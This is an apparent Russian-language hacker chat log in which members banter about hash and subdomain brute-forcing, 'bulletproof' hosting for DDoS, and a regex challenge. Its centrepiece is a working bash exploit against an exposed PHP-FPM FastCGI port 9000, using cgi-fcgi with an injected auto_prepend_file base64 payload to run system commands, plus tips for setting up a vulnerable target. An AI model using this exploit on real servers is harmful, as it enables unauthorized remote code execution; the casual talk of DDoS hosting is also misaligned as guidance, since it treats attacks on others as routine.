Брут для плохих людей, фи

да вот и я смотрю регулярка кривая походу.

Домены брутить тоже фу? 🌚

Покупать белый хост для додоза непохек. Надо арбузостойкие смотреть

Ага. Если верить regex101.com то походу не отработает регулярка, но лучше бы чекнуть на пыхе самому.

А бруто-сервера для брутания хэшей?

Я не для дудоса, а для брута сабдоменов, Окуня и иной автоматизации

На него жалоба не прилетит

Потому что он личный!

Когда купил себе 2 3080 в слай только для брутания хешей

Когда купил себе 2 3080 в слай только для брутания хешей

Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Или воспользоваться более мощным клиентом, например, таким.

\\\\\\/

Чет тут с слешами толи перебор, толи недобор

Ребятишки, можете поделиться ссылкой на уязвимый к этой атаке FastCGI? Чтобы развернуть у себя.

любой, только по дефолту listen с юникс сокета вроде /run/php/php7.3-fpm.sock на 127.0.0.1:9000 поменяй

Там не в слешах суть)
Регулярка рабочая

ты то 100% знаешь решение )) это твой таск ))

Я тоже выиграл?

тебе и так дам доступ ) без всяких тасков ) скинь только свой id